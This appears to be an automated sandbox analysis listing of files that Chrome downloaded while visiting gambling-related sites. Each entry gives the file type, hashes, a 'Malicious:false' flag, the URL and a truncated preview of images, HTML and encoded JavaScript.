                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 63 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4156
                                                                                                                                                          Entropy (8bit):7.839388968091748
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:D2ssJHZyRx9BkjHoYHLzdjMhT90bs91O7DhpW:85yGjH1dghTmbwO79pW
                                                                                                                                                          MD5:572961504453B8307F8AFD74382C4464
                                                                                                                                                          SHA1:CB9DAD597AE7D8921FD09C347107C623281819B7
                                                                                                                                                          SHA-256:57C0A73478E7C82039B8F451A1E216991166B7BFBE3957C2684B0FE5069BF041
                                                                                                                                                          SHA-512:9E39E0DE08D2FA06FAA4BF103FD8B6D68C27F4D7A13EAF5A175D73A80334813B9AFB506BA6C85C2A3F8E56D42639DBDB92F77A269E4BD96D4FCCFA07DEA06AAD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/ag/ag.png
                                                                                                                                                          Preview:.PNG........IHDR...?...%.......1"....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:19E100BC7B7B11E884ADEE14D294A800" xmpMM:DocumentID="xmp.did:19E100BD7B7B11E884ADEE14D294A800"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:19E100BA7B7B11E884ADEE14D294A800" stRef:documentID="xmp.did:19E100BB7B7B11E884ADEE14D294A800"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..(....IDATx..Yip[..=o.,..&.N.;....I..4)%....R(..e.......:.C..N..(.2.f`JJ..J.8.....$$.c...Y.d.O..{O.dY.. ..|c[
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 165 x 165, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):11893
                                                                                                                                                          Entropy (8bit):7.947833885578854
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:LyNNSs2q8sPgUmfCqVNJB4AQElMLqWEY6su8F6BpwDDkEnzPwsW2HUk86fyg:LyNNT2s4jf/41oyqWEY6suLBWDnzPwsh
                                                                                                                                                          MD5:B27E85B76F1B3DCDD4D98C789E51CFD9
                                                                                                                                                          SHA1:BA8EC058785FD8A0E1405D6643175CD7CF92DF28
                                                                                                                                                          SHA-256:01CF3C6CA09D7B6003FAF27CDF6FF31DC52EC67F73070A6C81BFCB50B7B9EA4C
                                                                                                                                                          SHA-512:0B835C7F0C8B05101A96F3CB43FB08577A8090B920417C5110CC0B2D0FF9E8FE5BD9B352BF305109245FD5B28D1FFCE757EE394B84FBF3386777D1119687228C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://x551005.com/ftl/commonPage/zh_CN/pubads/images/ads1.png
                                                                                                                                                          Preview:.PNG........IHDR.............=+=.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:26dd70ad-1e68-4847-a630-c1be6753ad0b" xmpMM:DocumentID="xmp.did:9640B8B49CE411E7AFAECB64E807888A" xmpMM:InstanceID="xmp.iid:9640B8B39CE411E7AFAECB64E807888A" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2f1ed4b1-bf86-774f-b9f0-6d0256dc0b0e" stRef:documentID="adobe:docid:photoshop:37a3863a-8f0a-11e7-af57-e7d8bbca7e19"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>i.....*.IDATx..}{.m[Y.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5876), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5876
                                                                                                                                                          Entropy (8bit):5.931265448812533
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vv2q6Vuctv8+yEF+y55OYTl/kcE0hIEr3Kj7/BuaI2AE+s38:VvpM8+yEFD5Os/jphDrawaI28
                                                                                                                                                          MD5:498EF62CD618BF0F826ED597080713CA
                                                                                                                                                          SHA1:AF47D9BB5B7BF7657A0839A36CCBBEEF6AB889A6
                                                                                                                                                          SHA-256:0478BA94BC06096AC6384475A91D693840733F6AEBD32970D36A780F24C4710C
                                                                                                                                                          SHA-512:1C513F598A22A863010C5A94416372C32D56B8A77085D876BD8405F971FD7756F399F63F0DB7340A4E88DAFC2C46B94A2EC15FD7C6F2873FCC54AF150CC22004
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/importPassword.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDZ8BdAGgG8AiAFgDkAnATSoC4AzAVzRgBcBLdJiRkQASgoBfMgFEAtgAsArB259BaYaLJQJVTkhAACJLwb8+VANwB5MACsQfAHQATEO35oQABQYoIEAZeAE9MEDIqAH0okCQAWRRXTgAbECpKADcoFM4QVgBCAAZJMStshiMGAF4oTCoAEVcADmAqMTJ+WudNBg6UWvqimAh2drJeQao6JgAPG3GU6sx+TDFMKTI7Rz5MXmc5KAgAcRBeXiCkdewqfjkIFGCfKCQkYEfXDKokNABlM4EaAA5l85AZeIlXPx2CFnq93gxPpFDAxMhYQABVBgpKgkMQdVbrTbbJy8PYHI7xTi8KACdBXDaGXgASXuj14cLeH1YVF+MgAKlFmfEfDYAEqCnwAQV+vwA6uKGhkmVTTJDobDgK4eXzBfEMb89TYGsyAGJMKLS2UKsVK0qUVwoADCKRQhlUPDpmgkvAU/CQziZrIeTxeXMRjIUKGAhVwZFdQK8zO1aFSKTI3H4AEc8gBpEAhViplLpi73fkoOAgNBFtP233+wNnVUQpIanxazAFXBiaSO36cMByfi8D3qIQSComaoNpBWWfOAAk2RS/FctMezhXa9pIClJbWzl91cwXE9GnCEmhl4oU6g1W8wCMKDcHigqX2vwUUFwzhkPCSCIaigZxqxgQCvx/YRnGgeEPi3HI8gJaoX3cdh3xSfYpQgfh/lRdEJhQ190I/ZwMQEFJnByIJeDlKAGDQLwgSsa8AzBNU2xhTkEVcSd6KMJYQLAwCfDeaCUBSVxuPglckJY5xOAgdcLgxFFpIjChDFeDRk1YAM7hDDkwx4o8QHLStqzIJAcguKTjO5SjeAstArJs1hKOszCyEfdTtQYUojwUE8z3HTRxAoEBQIYfwGAAH1izBcGqapIoYOIPwAfjJKhACo5QAuuUAEVjAEzTQA7+UATlNAAQjQB8p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://hg679.cc/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (57212), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):57212
                                                                                                                                                          Entropy (8bit):5.96791735433038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:bgtq+6jfAEMmU0PGo9KhuiaAc73LtPAFpIwe:7LfhhU1sriaNL5ADi
                                                                                                                                                          MD5:D3C921A5D728B64E494470536D9E16F3
                                                                                                                                                          SHA1:7E54A88B23A6CEF830F88892334037C1C85C4C4F
                                                                                                                                                          SHA-256:BED5E0787FE3F5EB912A33759EB74D06959AAB37C8222F74142C238931871054
                                                                                                                                                          SHA-512:4FF471125C0CF275C0018EBE606A3B51B0DCA718D001D803F5214E2BC40EA0858397D454483CBDCDEE68EE97EBD6E2DFAA90EAA54D890C3242FA1231C5E4EE7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/slides.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgFYBdAGgG8BBAMyQEYAuagVzRgBcBLdTd0zgJTkAvqQDmARzgAvJqw7c0vfqSRCAblABOAAhCk0pFAG4AhCzZceUIQCJmSEDqTstnDreNoAvNiSZbAAZOAAUAC1sBMnUUTgATHUDvZMwUb1sLBXRbZPYATwgQFGpMEG8bAH4QADooCAgAGzzMTgMBBhABAB8u3mqQAA8IFC12JG8UAWFMTKsldjsHJxc3D2NNXU5vYE40OJRgaoBlBvc4HpFjFu9ZxUwNbR0twOMtEHZmLTQdW54kUk65A2OkMaXYYU4SGMKGqcRA1CgzAaY285FgMBASCQnDAnFO+QYpkCpCgcTqXHUIAAEiBOGIwuxCXQSfUQHtKFotAckAx2Jg1CzCnsACIoMa8/kCEmc7mE4lQJAAOSg6gAYiMGGgkQ1SBA3uoOVzgAwAOQAHjAzHY7HQOhgDQV41sSFO8AAtHqQOpbDptJwoG6HWAQA10iF9dwHD78oV0pbrdkAHzhr2RpBmgD08ZtaETJoMg3YhoOpotVpzdodWPSLrObrQhZ9foDQZD6UVjZ0MbKtmzSY7A3Ymb7ufziJtjSgeSZJKtKEneSOhRAcQYAGYQGvSBi0OwQFoALIoOEznd7rQhUlxXZiBi2QiBCADWzbrEAUQVIDvIE/L5gDhtABbS8xBvORLDuVo1HIN4Pi+LtMHNEcuwKHsRx9DM8wEao90HfkAGo6CmUh9nFUxmVIpAAGEqx5Z1XTgN1KJfOItCgMQxCgMAGi/IkAQVMDbFOBttBfFcxBAVVVjmBhqjXQhSARE9yMUlB/yQAB5NAjhDEAOBnag1IcLSqLCKA0AkmddmoXZOD3OV+DQOz/QaE54i/YkHWkPIABkUFJO90DhQDzLiF9AJQXEeNVTgtBcGdoCWLSqRQSktAcxLHC09V1IyxEsrQUUxhStKZzeJBhj2AAVFA7x2PYDhf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):41871
                                                                                                                                                          Entropy (8bit):7.992259298251607
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:KtN1Iat5i5i6cxG73gtYL1GIW6PgC7duAr4/Vg4kG8tKZp7ymVh/Iy:KtzIB5ogbgKLXWJSfR4F7LhN
                                                                                                                                                          MD5:4A721108CF06046648F8A3695AA1BC08
                                                                                                                                                          SHA1:70FEDFE949E886DE18C0093E58C8060C1AFB6538
                                                                                                                                                          SHA-256:6F4F9183878C42635264769BFB04526DD7AD1E3792958B66C70E63FA99F6E7DF
                                                                                                                                                          SHA-512:0463B4843D8054A3105777A9C60E37204A3FCF1D67A558EB30535C4CE449D8FF4846188506964B066A54DCDC0A90C5F6E1BA95766AFAF0B4A9255C5A7DB5E4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/slot_bg.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:81C215FC47F611EA8026E512EBEAACE0" xmpMM:DocumentID="xmp.did:81C215FD47F611EA8026E512EBEAACE0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81C215FA47F611EA8026E512EBEAACE0" stRef:documentID="xmp.did:81C215FB47F611EA8026E512EBEAACE0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..4.....IDATx....\U....2...l...nv.6.B....z...ME........Wi...A@z...B...d{.}...{...;.....?..}:........<...=.r..~..9
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2756), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2756
                                                                                                                                                          Entropy (8bit):5.896185491872585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V8dnAImgQA4/4U1HjCiiI8cGsrve2VhY3hmTlDRlm2NdyqbsCafXTcI1FqTrPUim:V8gFWU1H7iI8krSElDRlmgdXbmwI1FsO
                                                                                                                                                          MD5:FAB708A58E7441D050A75FD27FE1C8C0
                                                                                                                                                          SHA1:699B9FB8FA80B435037E81AAC72D4D1FDD5FA1AC
                                                                                                                                                          SHA-256:F1EBDD7CB694B2D01550386A7B274DB6B28C6243D76147723E614C232127617B
                                                                                                                                                          SHA-512:FA8190CB90CA691F52FD11C19E272B9E58C3269414CAFC48E664AB41852D8FC9C52B287E5926CB0B4920A3EFA0277D4181995BC8C12F412EABF4F6AC95F8E042
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/components/menuSubA.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZkIF0AaAbxQDUBHADQC4AzAVzRgBcBLdTJE9kpwCUZAETMkIAARJ2AJ04dRAbgDyYAFYgOAOgAmIRpzQgACnJQQQc9gE9MA0QH0nIJAFkUe5gBsQo8gA3KB9mEHoAQgAGAF8hZWC5KRAAXk5MUQARPQAOYFEhEjQ0nTRMEEKfNIyomAhGApJmatEAOQBNAA9VRqgUzDKhTDIYknUtDkxmHQBbKAgAcRB2dmskIexRTiQAGRQAc2MA0TB0CXMUGe3/Ei2kUwB1USIhQrIICwgkek2kZjBjnNOsdjAZgbc7FYkM8SHooOwoExWBxuIMyHJlsw5GgyD5tuwfqQkAALFDAABCZ2+EVwMVGMEuEGYqz09EGw1G4207Cms3mSxWaw2dz2hzQx1OaHOFiukhB9yeL0KwHhMGJ9DIkull2uSLYXB46zI7GJ2x0804lKlSEwQjpJBmy1Jem+ZCMPlWch2+L1KMNIgx7CxaBkAH4HKakDptqLjAAfOMms3bR5CABkaaTUZJZKtElD3yj7s9mBY+tRvADmOxonJAElWpknOTVK0AKoAZVEERSUZgPigAC9B3FCaN9ssAMID4e+g1lPgCYTo6shnz6QxQXzsHTk0E6ftDwd7tB6Xj8QR2kiSdgPTh6E1zisiTiMCNmoEiRIyFIAEgyADEfxgO4IBSk4ogANRZjowHRnohTsL2OhGKeGSzGBzAALR4rIWG+PQIDUJgURCAUyhFqC6GOlKOH4vhPgFAeSA2qIwD3iaAQ7qhZ6iHiTFIJwg4gLaABUDgoVRfGcIRxGkUx7EPsStqQbgQiQaIEDAnaow3qYKDfGWfpoq+mARDBn5kN+SB/tRmFYXMxgAHx4rJGTQZG0aniAnQaWRiG2aIQH/KB4FQTBcH3vE/5BcBoXMBBHlmpFCHMTauKGASUYoIwjA3raOh+Iw7BYe48LEuaYA2rwOiKSatpYT
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/video/mg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (836), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):836
                                                                                                                                                          Entropy (8bit):5.739559546675709
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VaHECBEsaA0wIxlGAum/RtjlVt9PUTX6KM+d307V4VM:VakCBNaZeavTPUbTd3YV4VM
                                                                                                                                                          MD5:DE6649B09F03B21F4DA8C469D3DEE5A7
                                                                                                                                                          SHA1:6D569D5D0E89665B3C7A0E7EDFAF6F17B4BFD059
                                                                                                                                                          SHA-256:E793650B250F7BFB7C3A09A1321AFBA5FF55BED2E432B531A0B510581DE90E86
                                                                                                                                                          SHA-512:F77F526181A814D29B50C38E693AD26BC133ACC3C9887341FAB95597D0D43C3E722D9FB5A2CE98B9BEBD05A809DE6FB1DE97FFBD913A616D131D70731940DACA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/125/fixedPost.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAnAZgAYBdAGgG8AxAGQDMB2ALloFc0YAXAS3Uw9KQBKcgF9SHADYBFSszaceaPgNIhhAIhZIQAAiQcATl07qA3AHkwAKxCcAdABMQtLmhAAFAygggDHAJ6YSKTqAPqhIEgAsigOLBIg6hQAblASLCCMAISEIoKmIJjqhFzuABbq+akGOlwAvIXFMBC0laRodeQwKAC2EOggaBxIjKKkDlAcUHLs3LzCBiAcLAZoXQ5oABIo+oxcjs5Q8Rx2AMLo+lBDdjAb2/qk/foAymUowNmEpC4AHiAO7h2HFGIlBpB6SzeDhG5CeHFOEmMcBmCnm5A4ZS4SDscNe7zqWQAjGCYItJv8UXMlMJqjoOHUMViBHVgK4HO87M8ANIASQAcgUioSAIJWADmlSKdgA9OoANRIOXqaVskA/OxWJCVOwYwaYVizRRBYQnAAkbh+HAAKkj9fIqZgTXZfv9Afo6tiXQCgXlfWIUJ1FmgnAZKUaaVAavTGdjTaSQOSAKIJCFDZkxuyhbQSWiZmAAH3zHFMi2WqzpmOxuLewAA/Egig4uMkkuRLtwYAioEgRuovW6OOoxNgG+ooK2YBJuyMM/2gTcpwAvRekSaGGFlRa0Rizrh/b36Oyb5ziSNipY7yvOveu+dTAznjigwTiK+hZJFHRtUcQVvoUaTkil5YjiQIIkiz7EIIwHYhEjpiO2xgAEqDCGlBoCM2DECIpi0jADRFAAagAqtKAAckpoKQKCkES3z2kaHDCI0NAMJUYhoPEEjtFx+TYk4tBHBI9IwHYar9H4SDPqYQA=")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 45887
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):10933
                                                                                                                                                          Entropy (8bit):7.978289769452813
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:Y7dGgHQd6sC8ZiM9irmQ5+XLTMf9Yoet/NaNzLlMv2EjpNVm4S7L9X+1D:mdGDdqdEiip265/MfMv1VtkJw
                                                                                                                                                          MD5:9201993F84E8B463DFB0D3C14506D2EA
                                                                                                                                                          SHA1:04A2291EDF290569ED67B1C09E5C29F4E7676EA0
                                                                                                                                                          SHA-256:BF481B607E2C60EA256B23BBAE8A0BEEC2B3FCEF5190B6453E6C2E1D09894525
                                                                                                                                                          SHA-512:3E63465F276EA05228FB160B246DBD59E7E1B7967BB7FAB493257218BB55B89314CC5D53FF3778815BCCD41E23D726F67FFDA2D00BA1A85E732FF8DD8C3E6B2A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/common/js/bootstrap/bootstrap.js?v=1717580749344
                                                                                                                                                          Preview:...........}kw.F............xrg.4.c[....7Vf.Z.,DB.......G....g..$..=..X..Q]]]]U]].8.r._z_.^TUS7.|.{.d.d..^..i....wEs.y.Iu.b....|w...:z....|.;.)..X.z..!.......V.i..}.......l.V......M.......:...._....+l.._..e9/.g...X......r5.4e5...........{..eY..c.i..6W..7/nz...j.OL........N...-....eQ..$..v.......X..../.C.hX/fe.OzIzvt.o.$..^}..9O......O....Nn.=v...O........{<...q.Z..`..%to.$.{.......%>..O.L.b.M...7.......~bF...E.:.|......:..kq.K.....&H.....7..E.........M'..........^9. L.U.u.aV.a..,3....f.....Q.6W.l6\.w...bC.S\.f@;.....t...I>.g..r.6.v....*..n...!t.._.D4..[..,W...S.../.S....%...>.......e.wX...j..-...k`.q]4..uQ...B.........v.......I..+...r.Hp.x..g....E9...|.u.a0-f.;.......tV.L..".n..6...e:,k...W.....?..r./...Tn..h".@..&.8Z....:{t6..@_.. 6..#....b....F...^...........NfU]..1U....o_..}..&H$.....}}...?......=..Hr...P.2..%.q*......5.z.T...y.$.N1.Yn.h..6Z.jY\BI...{{.4\..Y>).../....g........p...#........i...~.S....j.....!W.........,1k..<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 153 x 58, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1824
                                                                                                                                                          Entropy (8bit):7.776295626839169
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:rtU7Cs30gIrIBFMbs8oCmF1I6a27VHjjQTrDf:ZoCs0rIBFAsvCmFza2VAnDf
                                                                                                                                                          MD5:C42F0ABFE26233659F193486C6A1DCF3
                                                                                                                                                          SHA1:37566F982D7391EA3AFF57CC5D56D529AC3AFD0D
                                                                                                                                                          SHA-256:3AA35E150D01A4D2E5EA44E69CCEF9C32E37EA0D27A35CB36D9654A38D71B97A
                                                                                                                                                          SHA-512:DF4D21026704EB214CDFD27AB840718459AFE2B2CF87AD618821B9A1BEA3F0F877DA53B869536C1776B00D26968FB781D55C35CBA3420EA665E4627AF791BF6A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......:.............PLTE...ZIKZIKZIKZIK....ZIK..ZIK............ZIK..ZIKZIKZIKZIKZIKZIK........ZIK................................ZIK...........o_....-tRNS...U".w..f...D..3..Df.U.w"..D.w.f3...w..UfL/.....IDATh....n.0........g..6.d.?c.._....P.!Z..i..........u.....C..].!.....I.R..U..e.=.x.........7x_1.%`...Z.j...Br.`....(..,?.g.pJ)..%1x.z.......UYv...U.d!..:i..V.u+(...2....v.1A49.e....Z.:.#..$.)..$........jgc4.e...7..3v...f.5.....}|..P_...D%...XP....(i.~@.cs.....u.qG.~..|.....u...-..Mf.H.RwJ\.2.[fJ...d....Q.......1."c........"...........;tP:..h....P....8..9~..YE....dJ+.GM7..a.D......_..Y..).S.'` ......E.,..ah.45.d......I.....U.&........./...I....~y=.._.V....X.a......MV..L.r.4.'.}...3..&Y..<q.0h..<..r].D^e..$%..d.$fI/.&.I.)..J......!.:J.R.AP..Y4y%.b.."...-..k....j.i."..W........$...|..6..P.M....$.D.j .....7?'..4.9.rT8../y.....\q.N..d...).....v..-.Yl.)."2...]t.M.l.J4.......|.j.d..<....%.q...Q..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 100
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):41295
                                                                                                                                                          Entropy (8bit):7.942541981139238
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:y2NQx9ygf1S1ta2Wp7LnEiyDUCeAy1JI1r/kvFsDb2:y2NQ1tSXWp7Lfy4hIl/w
                                                                                                                                                          MD5:CC6C3902D682170F4529B42F9059ADD3
                                                                                                                                                          SHA1:5BFFB834B185D941DEDB916706C27628B1E18DF8
                                                                                                                                                          SHA-256:1CEA6DBF9C84870B866D1A1ED383736A2175C95B260E71775FED2EFEB8AC737D
                                                                                                                                                          SHA-512:AB4ECEA534149F0DDAABAC7B70A9C0E99F1DA8EBEE7F3C3076EB5A58411A4289BDE4E63E6A2C87F0E5893547EDE8B89939C415837206A30EBCC7CEB9CCBC92D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
